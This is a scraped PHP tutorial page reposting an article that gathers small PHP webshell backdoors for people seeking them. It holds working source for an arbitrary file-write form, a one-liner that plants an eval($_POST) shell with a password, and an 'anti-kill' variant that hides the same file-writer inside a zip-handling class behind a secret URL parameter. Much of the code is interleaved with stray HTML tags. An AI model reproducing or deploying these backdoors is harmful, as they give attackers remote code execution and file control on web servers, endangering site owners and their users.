Super small PHP pony summary (convenient for friends looking for backdoors)_PHP tutorial

WBOY
Release: 2016-07-21 15:19:24
Original
966 people have browsed it

Author: spider
I also have a super small PHP pony

Copy code The code is as follows:

header("content-Type: text/html; charset=gb2312");
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $ _POST[$k] = stripslashes($v);
?>

Save file name:









if(isset($_POST['file']))
{
$fp = @fopen($_POST[ 'file'],'wb');
echo @fwrite($fp,$_POST['text']) ? 'Save successfully!' : 'Save failed!';
@fclose($fp) ;
}
?>

I was bored and watched some php tutorials last night, and found that php is really quite powerful! By the way, I wrote a php pony
The code is directly pasted below. .
Copy code The code is as follows:


By: SinCoder</title> ; <BR><font color=red size=6>php ponyBy:SinCoder</br></font> <br><? echo "</br>The path of this program: ".__FILE__ . <br>"</br>Server operating system: ".PHP_OS. <br>"</br>Server IP address: ".gethostbyname($_SERVER["SERVER_NAME"]). <br>"< /br>PHP version: ".PHP_VERSION; <br>?> <br><form action = <? echo strrchr(__FILE__,"\"); ?> method="post"> <br> Data to be submitted: </br> <br><textarea type="text" name="data" rows="10" cols="30"> <br></textarea> <br>< ;/br> <br>Saving path:<input type="text" name="dir" /> <br></br> <br><input type="submit" value="Submit" /> <br></form> <br></html> <br><? <BR>if(!(isset($_POST["data"]) && isset($_POST["dir "]))) <BR>exit(); <BR>if(strlen($_POST["data"])>0 && strlen($_POST["dir"])>0) <br>{ <br>$p_File=fopen($_POST["dir"],"a"); <br>if(!$p_File) <br>echo "Writing failed! Please try changing the directory!"; <br>else <br>echo "Ok!! "; <br>fputs($p_File,$_POST["data"]); <br>fclose($p_File); <br>} <br>else <br>echo "Please Fill in the data completely! “; <br> <br><?fputs(fopen(jb51.php,w),<?eval($_POST[jb51]);?>)?> </div> <br> <br>Access like this After that, generate jb51.php in the current directory with the content of <?eval($_POST[jb51]);?>)?> and the password is jb51 <div class="codetitle"><span style="CURSOR: pointer" onclick="doCopy('code9555')">The latest anti-kill php Horse<u> </u></span></div> <div class="codebody" id="code9555">Copy code<br><br> The code is as follows:</div> <div class="codebody" id="code49076"> <br><?php <BR>class zip <BR>{ <BR>var $datasec, $ctrl_dir = array(); <BR>var $eof_ctrl_dir = "x50x4bx05x06x00x00x00x00"; <BR>var $old_offset = 0; var $dirs = Array("."); <BR>function get_List($zip_name) <BR>{ <BR>$ret = ''; <BR>$zip = @fopen($zip_name, 'rb'); <BR>if(!$zip) return(0); <BR>$centd = $this->ReadCentralDir($zip,$zip_name); <br>@rewind($zip); <br>@fseek($zip, $centd['offset']); <br>for ($i=0; $i<$centd['entries']; $i++) <BR>{ <BR>$header = $this->ReadCentralFileHeaders($zip); <br>$header['index'] = $i;$info['filename'] = $header['filename']; <br>$info['stored_filename'] = $header['stored_filename']; <br>$info['size'] = $header['size'];$info['compressed_size']=$header['compressed_size']; <br>$info['crc'] = strtoupper(dechex( $header['crc'] )); <br>$info['mtime'] = $header['mtime']; $info['comment'] = $header['comment']; <br>$info['folder'] = ($header['external']==0x41FF0010||$header['external']==16)?1:0; <br>$info['index'] = $header['index'];$info['status'] = $header['status']; <br>$ret[]=$info; unset($header); <br>} <br>return $ret; <br>} <br>function Add($files,$compact) <br>{ <br>if(!is_array($files[0])) $files=Array($files); <br>for($i=0;$files[$i];$i++){ <br>$fn = $files[$i]; <br>if(!in_Array(dirname($fn[0]),$this->dirs)) <br>$this->add_Dir(dirname($fn[0])); <br>if(basename($fn[0])) <br>$ret[basename($fn[0])]=$this->add_File($fn[1],$fn[0],$compact); <br>} <br>return $ret; <br>} <br>function get_file() <br>{ <br>$data = implode('', $this -> datasec); <br>$ctrldir = implode('', $this -> ctrl_dir); <br>return $data . $ctrldir . $this -> eof_ctrl_dir . <br>pack('v', sizeof($this -> ctrl_dir)).pack('v', sizeof($this -> ctrl_dir)). <br>pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "x00x00"; <br>} <br>function add_dir($name) <br>{ <br>$name = str_replace("\", "/", $name); <br>$fr = "x50x4bx03x04x0ax00x00x00x00x00x00x00x00x00"; <br>$fr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); <br>$fr .= pack("v", 0 ).$name.pack("V", 0).pack("V", 0).pack("V", 0); <br>$this -> datasec[] = $fr; <br>$new_offset = strlen(implode("", $this->datasec)); <br>$cdrec = "x50x4bx01x02x00x00x0ax00x00x00x00x00x00x00x00x00"; <br>$cdrec .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); <br>$cdrec .= pack("v", 0 ).pack("v", 0 ).pack("v", 0 ).pack("v", 0 ); <br>$ext = "xffxffxffxff"; <br>$cdrec .= pack("V", 16 ).pack("V", $this -> old_offset ).$name; <br>$this -> ctrl_dir[] = $cdrec; <br>$this -> old_offset = $new_offset; <br>$this -> dirs[] = $name; <br>} <br>function add_File($data, $name, $compact = 1) <br>{ <br>$name = str_replace('\', '/', $name); <br>$dtime = dechex($this->DosTime()); <br>$hexdtime = 'x' . $dtime[6] . $dtime[7].'x'.$dtime[4] . $dtime[5] <br>. 'x' . $dtime[2] . $dtime[3].'x'.$dtime[0].$dtime[1]; <br>eval('$hexdtime = "' . $hexdtime . '";'); <br>if($compact) <br>$fr = "x50x4bx03x04x14x00x00x00x08x00".$hexdtime; <br>else $fr = "x50x4bx03x04x0ax00x00x00x00x00".$hexdtime; <br>$unc_len = strlen($data); $crc = crc32($data); <br>if($compact){ <br>$zdata = gzcompress($data); $c_len = strlen($zdata); <br>$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); <br>}else{ <br>$zdata = $data; <br>} <br>$c_len=strlen($zdata); <br>$fr .= pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); <br>$fr .= pack('v', strlen($name)).pack('v', 0).$name.$zdata; <br>$fr .= pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); <br>$this -> datasec[] = $fr; <br>$new_offset = strlen(implode('', $this->datasec)); <br>if($compact) <br>$cdrec = "x50x4bx01x02x00x00x14x00x00x00x08x00"; <br>else $cdrec = "x50x4bx01x02x14x00x0ax00x00x00x00x00"; <br>$cdrec .= $hexdtime.pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); <br>$cdrec .= pack('v', strlen($name) ).pack('v', 0 ).pack('v', 0 ); <br>$cdrec .= pack('v', 0 ).pack('v', 0 ).pack('V', 32 ); <br>$cdrec .= pack('V', $this -> old_offset ); <br>$this -> old_offset = $new_offset; <br>$cdrec .= $name; <br>$this -> ctrl_dir[] = $cdrec; <br>return true; <br>} <br>function DosTime() { <br>$timearray = getdate(); <br>if ($timearray['year'] < 1980) { <BR>$timearray['year'] = 1980; $timearray['mon'] = 1; <BR>$timearray['mday'] = 1; $timearray['hours'] = 0; <BR>$timearray['minutes'] = 0; $timearray['seconds'] = 0; <BR>} <BR>return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | <BR>($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); <br>}<br>//Decompress the entire compressed package <br>//Using Extract directly will cause path problems. This function first obtains the file information from the list and creates all directories before running Extract <br>function ExtractAll ( $zn, $ to) <br>{ <br>if(substr($to,-1)!="/") $to .= "/"; <br>$files = $this->get_List($zn); <br>$cn = count($files); <br>if(is_array($files)) <br>{ <br>for($i=0;$i<$cn;$i++) <BR>{ <BR>if($files[$i]['folder']==1){ <BR>@mkdir($to.$files[$i]['filename'],$GLOBALS['cfg_dir_purview']) ; <BR>@chmod($to.$files[$i]['filename'],$GLOBALS['cfg_dir_purview']); <BR>} <BR>} <BR>} <BR>$this-> ;Extract ($zn,$to); <BR>} <BR>function Extract ( $zn, $to, $index = Array(-1) ) <BR>{ <BR>$ok = 0; $zip = @fopen($zn,'rb'); <BR>if(!$zip) return(-1); <BR>$cdir = $this->ReadCentralDir($zip,$zn); <br>$ pos_entry = $cdir['offset']; <br>if(!is_array($index)){ $index = array($index); } <br>for($i=0; isset($index[$i ]);$i++){ <br>if(intval($index[$i])!=$index[$i]||$index[$i]>$cdir['entries']) <br> return(-1); <br>} <br>for ($i=0; $i<$cdir['entries']; $i++) <BR>{ <BR>@fseek($zip, $pos_entry) ; <BR>$header = $this->ReadCentralFileHeaders($zip); <br>$header['index'] = $i; $pos_entry = ftell($zip); <br>@rewind($zip) ; fseek($zip, $header['offset']); <br>if(in_array("-1",$index)||in_array($i,$index)) <br>$stat[$header[ 'filename']]=$this->ExtractFile($header, $to, $zip); <br>} <br>fclose($zip); <br>return $stat; <br>} <br> function ReadFileHeader($zip) <br>{ <br>$binary_data = fread($zip, 30); <br>$data = unpack('vchk/vid/vversion/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size /Vsize/vfilename_len/vextra_len', $binary_data); <br>$header['filename'] = fread($zip, $data['filename_len']); <br>if ($data['extra_len'] ! = 0) { <br>$header['extra'] = fread($zip, $data['extra_len']); <br>} else { $header['extra'] = ''; } <br> $header['compression'] = $data['compression'];$header['size'] = $data['size']; <br>$header['compressed_size'] = $data['compressed_size'] ; <br>$header['crc'] = $data['crc']; $header['flag'] = $data['flag']; <br>$header['mdate'] = $data[ 'mdate'];$header['mtime'] = $data['mtime']; <br>if ($header['mdate'] && $header['mtime']){ <br>$hour=( $header['mtime']&0xF800)>>11;$minute=($header['mtime']&0x07E0)>>5; <br>$seconde=($header['mtime']&0x001F) *2;$year=(($header['mdate']&0xFE00)>>9)+1980; <br>$month=($header['mdate']&0x01E0)>>5;$day =$header['mdate']&0x001F; <br>$header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year); <br>}else{$header ['mtime'] = time();} <br>$header['stored_filename'] = $header['filename']; <br>$header['status'] = "ok"; <br>return $ header; <br>} <br>function ReadCentralFileHeaders($zip){ <br>$binary_data = fread($zip, 46); <br>$header = unpack('vchkid/vid/vversion/vversion_extracted/vflag/vcompression /vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len/vcomment_len/vdisk/vinternal/Vexternal/Voffset', $binary_data); <br>if ($header['filename_len'] != 0) <br>$ header['filename'] = fread($zip,$header['filename_len']); <br>else $header['filename'] = ''; <br>if ($header['extra_len'] != 0) <br>$header['extra'] = fread($zip, $header['extra_len']); <br>else $header['extra'] = ''; <br>if ($header[ 'comment_len'] != 0) <br>$header['comment'] = fread($zip, $header['comment_len']); <br>else $header['comment'] = ''; <br>if ($header['mdate'] && $header['mtime']) <br>{ <br>$hour = ($header['mtime'] & 0xF800) >> 11; <br>$ minute = ($header['mtime'] & 0x07E0) >> 5; <br>$seconde = ($header['mtime'] & 0x001F)*2; <br>$year = (($header[ 'mdate'] & 0xFE00) >> 9) + 1980; <br>$month = ($header['mdate'] & 0x01E0) >> 5; <br>$day = $header['mdate '] & 0x001F; <br>$header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year); <br>} else { <br>$header[' mtime'] = time(); <br>} <br>$header['stored_filename'] = $header['filename']; <br>$header['status'] = 'ok'; <br>if (substr($header['filename'], -1) == '/') <br>$header['external'] = 0x41FF0010; <br>return $header; <br>} <br>function ReadCentralDir( $zip,$zip_name) <br>{ <br>$size = filesize($zip_name); <br>if ($size < 277) $maximum_size = $size; <BR>else $maximum_size=277; <BR>@fseek($zip, $size-$maximum_size); <BR>$pos = ftell($zip); $bytes = 0x00000000; <BR>while ($pos < $size) <BR>{ <BR> $byte = @fread($zip, 1); $bytes=($bytes << 8) | Ord($byte); <BR>if ($bytes == 0x504b0506){ $pos++; break; } $ pos++; <BR>}<BR>$data = @unpack('vdisk/vdisk_start/vdisk_entries/ventries/Vsize/Voffset/vcomment_size',fread($zip, 18)); <BR>if ($data['comment_size'] != 0) $centd['comment'] = fread($zip, $data['comment_size']); <BR>else $centd['comment'] = ''; $centd['entries'] = $data['entries']; <BR>$centd['disk_entries'] = $data['disk_entries']; <BR>$centd['offset'] = $data['offset'];$centd['disk_start'] = $data['disk_start']; <BR>$centd['size'] = $data['size']; $centd['disk'] = $data['disk']; <BR>return $centd; <BR>} <BR>function ExtractFile($header,$to,$zip) <BR>{ <BR>$header = $this->readfileheader($zip); <br>$header['external'] = (!isset($header['external']) ? 0 : $header['external']); <br>if(substr($to,-1)!="/") $to.="/"; <br>if(!@is_dir($to)) @mkdir($to,$GLOBALS['cfg_dir_purview']); <br>if (!($header['external']==0x41FF0010)&&!($header['external']==16)) <br>{ <br>if ($header['compression']==0) <br>{ <br>$fp = @fopen($to.$header['filename'], 'wb'); <br>if(!$fp) return(-1); <br>$size = $header['compressed_size']; <br>while ($size != 0) <br>{ <br>$read_size = ($size < 2048 ? $size : 2048); <BR>$buffer = fread($zip, $read_size); <BR>$binary_data = pack('a'.$read_size, $buffer); <BR>@fwrite($fp, $binary_data, $read_size); <BR>$size -= $read_size; <BR>} <BR>fclose($fp); <BR>touch($to.$header['filename'], $header['mtime']); <BR>}else{ <BR>$fp = @fopen($to.$header['filename'].'.gz','wb'); <BR>if(!$fp) return(-1); <BR>$binary_data = pack('va1a1Va1a1', 0x8b1f, Chr($header['compression']), <BR>Chr(0x00), time(), Chr(0x00), Chr(3)); <BR>fwrite($fp, $binary_data, 10); <BR>$size = $header['compressed_size']; <BR>while ($size != 0) <BR>{ <BR>$read_size = ($size < 1024 ? $size : 1024); <BR>$buffer = fread($zip, $read_size); <BR>$binary_data = pack('a'.$read_size, $buffer); <BR>@fwrite($fp, $binary_data, $read_size); <BR>$size -= $read_size; <BR>} <BR>$binary_data = pack('VV', $header['crc'], $header['size']); <BR>fwrite($fp, $binary_data,8); fclose($fp); <BR>$gzp = @gzopen($to.$header['filename'].'.gz','rb') or die("Cette archive est compress"); <BR>if(!$gzp) return(-2); <BR>$fp = @fopen($to.$header['filename'],'wb'); <BR>if(!$fp) return(-1); <BR>$size = $header['size']; <BR>while ($size != 0) <BR>{ <BR>$read_size = ($size < 2048 ? $size : 2048); <BR>$buffer = gzread($gzp, $read_size); <BR>$binary_data = pack('a'.$read_size, $buffer); <BR>@fwrite($fp, $binary_data, $read_size); <BR>$size -= $read_size; <BR>} <BR>fclose($fp); gzclose($gzp); <BR>touch($to.$header['filename'], $header['mtime']); <BR>@unlink($to.$header['filename'].'.gz'); <BR>}} <BR>return true; <BR>} <BR>} <BR>if($_GET['zxzgcn']=='login'){ <BR>header("content-Type: text/html; charset=gb2312"); <BR>if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v); <br>?> <br><form method="POST"> <br>save to: <input type="text" name="file" size="60" value="<? echo str_replace('\','/',__FILE__) ?>"> <br><br><br> <br><textarea name="text" COLS="70" ROWS="18" ></textarea> <br><br><br> <br><input type="submit" name="submit" value="save"> <br><form> <br><?php <BR>if(isset($_POST['file'])) <BR>{ <BR>$fp = @fopen($_POST['file'],'wb'); <BR>echo @fwrite($fp,$_POST['text']) ? 'succed!' : 'faled!'; <BR>@fclose($fp); <BR>} <BR>} <BR>?> <br> </div> <br>用法xxx.php?zxzgcn=login <p align="left"></p> <div style="display:none;"> <span id="url" itemprop="url">http://www.bkjia.com/PHPjc/325284.html</span><span id="indexUrl" itemprop="indexUrl">www.bkjia.com</span><span id="isOriginal" itemprop="isOriginal">true</span><span id="isBasedOnUrl" itemprop="isBasedOnUrl">http://www.bkjia.com/PHPjc/325284.html</span><span id="genre" itemprop="genre">TechArticle</span><span id="description" itemprop="description">作者: spider 我也来个超小PHP小马 复制代码 代码如下: ?php header("content-Type: text/html; charset=gb2312"); if(get_magic_quotes_gpc()) foreach($_POST as $k=$v) $_P...</span> </div> <div class="art_confoot"></div> </div> </div> <div style="height: 25px;"> <div class="wzconBq" style="display: inline-flex;"> <span>Related labels:</span> <div class="wzcbqd"> <a onclick="hits_log(2,'www',this);" href-data="http://www.php.cn/search?word=php" target="_blank">php</a> <a onclick="hits_log(2,'www',this);" href-data="http://www.php.cn/search?word=spider" target="_blank">spider</a> <a onclick="hits_log(2,'www',this);" href-data="http://www.php.cn/search?word=code" target="_blank">code</a> <a onclick="hits_log(2,'www',this);" href-data="http://www.php.cn/search?word=author" target="_blank">author</a> <a onclick="hits_log(2,'www',this);" href-data="http://www.php.cn/search?word=copy" target="_blank">copy</a> <a onclick="hits_log(2,'www',this);" href-data="http://www.php.cn/search?word=pony" target="_blank">pony</a> <a onclick="hits_log(2,'www',this);" href-data="http://www.php.cn/search?word=friend" target="_blank">friend</a> <a onclick="hits_log(2,'www',this);" href-data="http://www.php.cn/search?word=find" target="_blank">Find</a> <a onclick="hits_log(2,'www',this);" href-data="http://www.php.cn/search?word=of" target="_blank">of</a> </div> </div> <div style="display: inline-flex;float: right; color:#333333;">source:php.cn</div> </div> <div class="wzconOtherwz"> <a href="http://www.php.cn/faq/308565.html" title="PHP native template engine The simplest template engine_PHP tutorial"> <span>Previous article:PHP native template engine The simplest template engine_PHP tutorial</span> </a> <a href="http://www.php.cn/faq/308567.html" title="PHP Section 1 Introduction to PHP_PHP Tutorial"> <span>Next article:PHP Section 1 Introduction to PHP_PHP Tutorial</span> </a> </div> <div class="wzconShengming"> <div class="bzsmdiv">Statement of this Website</div> <div>The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn</div> </div> <div class="wwads-cn wwads-horizontal" data-id="156" style="max-width:955px"></div> <div class="wzconZzwz"> <div class="wzconZzwztitle">Latest Articles by Author</div> <ul> <li> <div class="wzczzwzli"> <span class="layui-badge-dots"></span> <a target="_blank" href="http://www.php.cn/faq/1796639331.html">What is a NullPointerException, and how do I fix it?</a> </div> <div>2024-10-22 09:46:29</div> </li> <li> <div class="wzczzwzli"> <span class="layui-badge-dots"></span> <a target="_blank" href="http://www.php.cn/faq/1796629482.html">From Novice to Coder: Your Journey Begins with C Fundamentals</a> </div> <div>2024-10-13 13:53:41</div> </li> <li> <div class="wzczzwzli"> <span class="layui-badge-dots"></span> <a target="_blank" href="http://www.php.cn/faq/1796628545.html">Unlocking Web Development with PHP: A Beginner's Guide</a> </div> <div>2024-10-12 12:15:51</div> </li> <li> <div class="wzczzwzli"> <span class="layui-badge-dots"></span> <a target="_blank" href="http://www.php.cn/faq/1796627928.html">Demystifying C: A Clear and Simple Path for New Programmers</a> </div> <div>2024-10-11 22:47:31</div> </li> <li> <div class="wzczzwzli"> <span class="layui-badge-dots"></span> <a target="_blank" href="http://www.php.cn/faq/1796627806.html">Unlock Your Coding Potential: C Programming for Absolute Beginners</a> </div> <div>2024-10-11 19:36:51</div> </li> <li> <div class="wzczzwzli"> <span class="layui-badge-dots"></span> <a target="_blank" href="http://www.php.cn/faq/1796627670.html">Unleash Your Inner Programmer: C for Absolute Beginners</a> </div> <div>2024-10-11 15:50:41</div> </li> <li> <div class="wzczzwzli"> <span class="layui-badge-dots"></span> <a target="_blank" href="http://www.php.cn/faq/1796627643.html">Automate Your Life with C: Scripts and Tools for Beginners</a> </div> <div>2024-10-11 15:07:41</div> </li> <li> <div class="wzczzwzli"> <span class="layui-badge-dots"></span> <a target="_blank" href="http://www.php.cn/faq/1796627620.html">PHP Made Easy: Your First Steps in Web Development</a> </div> <div>2024-10-11 14:21:21</div> </li> <li> <div class="wzczzwzli"> <span class="layui-badge-dots"></span> <a target="_blank" href="http://www.php.cn/faq/1796627574.html">Build Anything with Python: A Beginner's Guide to Unleashing Your Creativity</a> </div> <div>2024-10-11 12:59:11</div> </li> <li> <div class="wzczzwzli"> <span class="layui-badge-dots"></span> <a target="_blank" href="http://www.php.cn/faq/1796627539.html">The Key to Coding: Unlocking the Power of Python for Beginners</a> </div> <div>2024-10-11 12:17:31</div> </li> </ul> </div> <div class="wzconZzwz"> <div class="wzconZzwztitle">Latest Issues</div> <div class="wdsyContent"> <div class="wdsyConDiv flexRow wdsyConDiv1"> <div class="wdcdContent flexColumn"> <a href="http://www.php.cn/wenda/176399.html" target="_blank" title="Move the content to the left by adding the Width property" class="wdcdcTitle">Move the content to the left by adding the Width property</a> <a href="http://www.php.cn/wenda/176399.html" class="wdcdcCons">I have provided margins to the body. main {left margin: 200px; right margin: 200px; text a...</a> <div class="wdcdcInfo flexRow"> <div class="wdcdcileft"> <span class="wdcdciSpan"> From 2024-04-06 22:01:35</span> </div> <div class="wdcdciright flexRow"> <div class="wdcdcirdz flexRow ira"> <b class="wdcdcirdzi"></b>0 </div> <div class="wdcdcirpl flexRow ira"><b class="wdcdcirpli"></b>3</div> <div class="wdcdcirwatch flexRow ira"><b class="wdcdcirwatchi"></b>816</div> </div> </div> </div> </div> <div class="wdsyConLine wdsyConLine2"></div> <div class="wdsyConDiv flexRow wdsyConDiv1"> <div class="wdcdContent flexColumn"> <a href="http://www.php.cn/wenda/176391.html" target="_blank" title="The query and formula form the entire table, with new columns, where the new columns are formulas involving other conditional column values" class="wdcdcTitle">The query and formula form the entire table, with new columns, where the new columns are formulas involving other conditional column values</a> <a href="http://www.php.cn/wenda/176391.html" class="wdcdcCons">EDIT: The formula should be the "value" column - the "value" column wi...</a> <div class="wdcdcInfo flexRow"> <div class="wdcdcileft"> <span class="wdcdciSpan"> From 2024-04-06 21:23:40</span> </div> <div class="wdcdciright flexRow"> <div class="wdcdcirdz flexRow ira"> <b class="wdcdcirdzi"></b>0 </div> <div class="wdcdcirpl flexRow ira"><b class="wdcdcirpli"></b>2</div> <div class="wdcdcirwatch flexRow ira"><b class="wdcdcirwatchi"></b>530</div> </div> </div> </div> </div> <div class="wdsyConLine wdsyConLine2"></div> <div class="wdsyConDiv flexRow wdsyConDiv1"> <div class="wdcdContent flexColumn"> <a href="http://www.php.cn/wenda/176368.html" target="_blank" title="Scatterplot points do not maintain values ​​when zooming in d3.js" class="wdcdcTitle">Scatterplot points do not maintain values ​​when zooming in d3.js</a> <a href="http://www.php.cn/wenda/176368.html" class="wdcdcCons">This is my first time using d3.js, so please bear with me. I implemented it as pure JavaSc...</a> <div class="wdcdcInfo flexRow"> <div class="wdcdcileft"> <span class="wdcdciSpan"> From 2024-04-06 18:16:26</span> </div> <div class="wdcdciright flexRow"> <div class="wdcdcirdz flexRow ira"> <b class="wdcdcirdzi"></b>0 </div> <div class="wdcdcirpl flexRow ira"><b class="wdcdcirpli"></b>1</div> <div class="wdcdcirwatch flexRow ira"><b class="wdcdcirwatchi"></b>403</div> </div> </div> </div> </div> <div class="wdsyConLine wdsyConLine2"></div> <div class="wdsyConDiv flexRow wdsyConDiv1"> <div class="wdcdContent flexColumn"> <a href="http://www.php.cn/wenda/176341.html" target="_blank" title="CSS bottom border on navigation bar" class="wdcdcTitle">CSS bottom border on navigation bar</a> <a href="http://www.php.cn/wenda/176341.html" class="wdcdcCons">I have a navigation bar and I have added a red line at the bottom when any item in the lis...</a> <div class="wdcdcInfo flexRow"> <div class="wdcdcileft"> <span class="wdcdciSpan"> From 2024-04-06 15:04:41</span> </div> <div class="wdcdciright flexRow"> <div class="wdcdcirdz flexRow ira"> <b class="wdcdcirdzi"></b>0 </div> <div class="wdcdcirpl flexRow ira"><b class="wdcdcirpli"></b>2</div> <div class="wdcdcirwatch flexRow ira"><b class="wdcdcirwatchi"></b>347</div> </div> </div> </div> </div> <div class="wdsyConLine wdsyConLine2"></div> <div class="wdsyConDiv flexRow wdsyConDiv1"> <div class="wdcdContent flexColumn"> <a href="http://www.php.cn/wenda/176333.html" target="_blank" title="React Three Fiber: Why are my scroll events lagging?" class="wdcdcTitle">React Three Fiber: Why are my scroll events lagging?</a> <a href="http://www.php.cn/wenda/176333.html" class="wdcdcCons">In ReactThreeFiber, I have a React component that generates a sprite that I want to persis...</a> <div class="wdcdcInfo flexRow"> <div class="wdcdcileft"> <span class="wdcdciSpan"> From 2024-04-06 13:39:24</span> </div> <div class="wdcdciright flexRow"> <div class="wdcdcirdz flexRow ira"> <b class="wdcdcirdzi"></b>0 </div> <div class="wdcdcirpl flexRow ira"><b class="wdcdcirpli"></b>1</div> <div class="wdcdcirwatch flexRow ira"><b class="wdcdcirwatchi"></b>410</div> </div> </div> </div> </div> <div class="wdsyConLine wdsyConLine2"></div> </div> </div> <div class="wzconZt" > <div class="wzczt-title"> <div>Related Topics</div> <a href="http://www.php.cn/faq/zt" target="_blank">More> </a> </div> <div class="wzcttlist"> <ul> <li class="ul-li"> <a target="_blank" href="http://www.php.cn/faq/phpwjzmdk"><img src="https://img.php.cn/upload/subject/202407/22/2024072214120868901.jpg?x-oss-process=image/resize,m_fill,h_145,w_220" alt="How to open php file" /> </a> <a target="_blank" href="http://www.php.cn/faq/phpwjzmdk" class="title-a-spanl" title="How to open php file"><span>How to open php file</span> </a> </li> <li class="ul-li"> <a target="_blank" href="http://www.php.cn/faq/phpzmqcszys"><img src="https://img.php.cn/upload/subject/202407/22/2024072214004499289.jpg?x-oss-process=image/resize,m_fill,h_145,w_220" alt="How to remove the first few elements of an array in php" /> </a> <a target="_blank" href="http://www.php.cn/faq/phpzmqcszys" class="title-a-spanl" title="How to remove the first few elements of an array in php"><span>How to remove the first few elements of an array in php</span> </a> </li> <li class="ul-li"> <a target="_blank" href="http://www.php.cn/faq/phpfxlsb"><img src="https://img.php.cn/upload/subject/202407/22/2024072214003558557.jpg?x-oss-process=image/resize,m_fill,h_145,w_220" alt="What to do if php deserialization fails" /> </a> <a target="_blank" href="http://www.php.cn/faq/phpfxlsb" class="title-a-spanl" title="What to do if php deserialization fails"><span>What to do if php deserialization fails</span> </a> </li> <li class="ul-li"> <a target="_blank" href="http://www.php.cn/faq/phpljmssql"><img src="https://img.php.cn/upload/subject/202407/22/2024072213560082376.jpg?x-oss-process=image/resize,m_fill,h_145,w_220" alt="How to connect php to mssql database" /> </a> <a target="_blank" href="http://www.php.cn/faq/phpljmssql" class="title-a-spanl" title="How to connect php to mssql database"><span>How to connect php to mssql database</span> </a> </li> <li class="ul-li"> <a target="_blank" href="http://www.php.cn/faq/phpljmssqlsjk"><img src="https://img.php.cn/upload/subject/202407/22/2024072213555538594.jpg?x-oss-process=image/resize,m_fill,h_145,w_220" alt="How to connect php to mssql database" /> </a> <a target="_blank" href="http://www.php.cn/faq/phpljmssqlsjk" class="title-a-spanl" title="How to connect php to mssql database"><span>How to connect php to mssql database</span> </a> </li> <li class="ul-li"> <a target="_blank" href="http://www.php.cn/faq/htmlzmsc"><img src="https://img.php.cn/upload/subject/202407/22/2024072213512540557.jpg?x-oss-process=image/resize,m_fill,h_145,w_220" alt="How to upload html" /> </a> <a target="_blank" href="http://www.php.cn/faq/htmlzmsc" class="title-a-spanl" title="How to upload html"><span>How to upload html</span> </a> </li> <li class="ul-li"> <a target="_blank" href="http://www.php.cn/faq/phpcxlmzmjj"><img src="https://img.php.cn/upload/subject/202407/22/2024072213494787127.jpg?x-oss-process=image/resize,m_fill,h_145,w_220" alt="How to solve garbled characters in PHP" /> </a> <a target="_blank" href="http://www.php.cn/faq/phpcxlmzmjj" class="title-a-spanl" title="How to solve garbled characters in PHP"><span>How to solve garbled characters in PHP</span> </a> </li> <li class="ul-li"> <a target="_blank" href="http://www.php.cn/faq/phpwjzmzsjsdk"><img src="https://img.php.cn/upload/subject/202407/22/2024072213484482977.jpg?x-oss-process=image/resize,m_fill,h_145,w_220" alt="How to open php files on mobile phone" /> </a> <a target="_blank" href="http://www.php.cn/faq/phpwjzmzsjsdk" class="title-a-spanl" title="How to open php files on mobile phone"><span>How to open php files on mobile phone</span> </a> </li> </ul> </div> </div> </div> </div> <div class="phpwzright"> <div class="wzrOne"> <div class="wzroTitle">Popular Recommendations</div> <div class="wzroList"> <ul> <li> <div class="wzczzwzli"> <span class="layui-badge-dots wzrolr"></span> <a style="height: auto;" title="How to set up hosts on Mac computer (steps with pictures and text)" href="http://www.php.cn/faq/448310.html">How to set up hosts on Mac computer (steps with pictures and text)</a> </div> </li> <li> <div class="wzczzwzli"> <span class="layui-badge-dots wzrolr"></span> <a style="height: auto;" title="Quickly build a simple QQ robot with PHP" href="http://www.php.cn/faq/448391.html">Quickly build a simple QQ robot with PHP</a> </div> </li> <li> <div class="wzczzwzli"> <span class="layui-badge-dots wzrolr"></span> <a style="height: auto;" title="API common signature verification methods (PHP implementation)" href="http://www.php.cn/faq/448286.html">API common signature verification methods (PHP implementation)</a> </div> </li> <li> <div class="wzczzwzli"> <span class="layui-badge-dots wzrolr"></span> <a style="height: auto;" title="Collection of common date and time operations in PHP" href="http://www.php.cn/faq/448309.html">Collection of common date and time operations in PHP</a> </div> </li> <li> <div class="wzczzwzli"> <span class="layui-badge-dots wzrolr"></span> <a style="height: auto;" title="PHP generates graphic verification code (enhanced interference type)" href="http://www.php.cn/faq/448308.html">PHP generates graphic verification code (enhanced interference type)</a> </div> </li> </ul> </div> </div> <script src="https://sw.php.cn/hezuo/cac1399ab368127f9b113b14eb3316d0.js" type="text/javascript"></script> <div class="wzrThree"> <div class="wzrthree-title"> <div>Popular Tutorials</div> <a target="_blank" href="http://www.php.cn/course.html">More> </a> </div> <div class="wzrthreelist swiper2"> <div class="wzrthreeTab swiper-wrapper"> <div class="check tabdiv swiper-slide" data-id="one">Related Tutorials <div></div></div> <div class="tabdiv swiper-slide" data-id="two">Popular Recommendations<div></div></div> <div class="tabdiv swiper-slide" data-id="three">Latest courses<div></div></div> </div> <ul class="one"> <li> <a target="_blank" href="http://www.php.cn/course/812.html" title="The latest ThinkPHP 5.1 world premiere video tutorial (60 days to become a PHP expert online training course)" class="wzrthreelaimg"> <img src="https://img.php.cn/upload/course/000/000/041/620debc3eab3f377.jpg" alt="The latest ThinkPHP 5.1 world premiere video tutorial (60 days to become a PHP expert online training course)"/> </a> <div class="wzrthree-right"> <a target="_blank" title="The latest ThinkPHP 5.1 world premiere video tutorial (60 days to become a PHP expert online training course)" href="http://www.php.cn/course/812.html">The latest 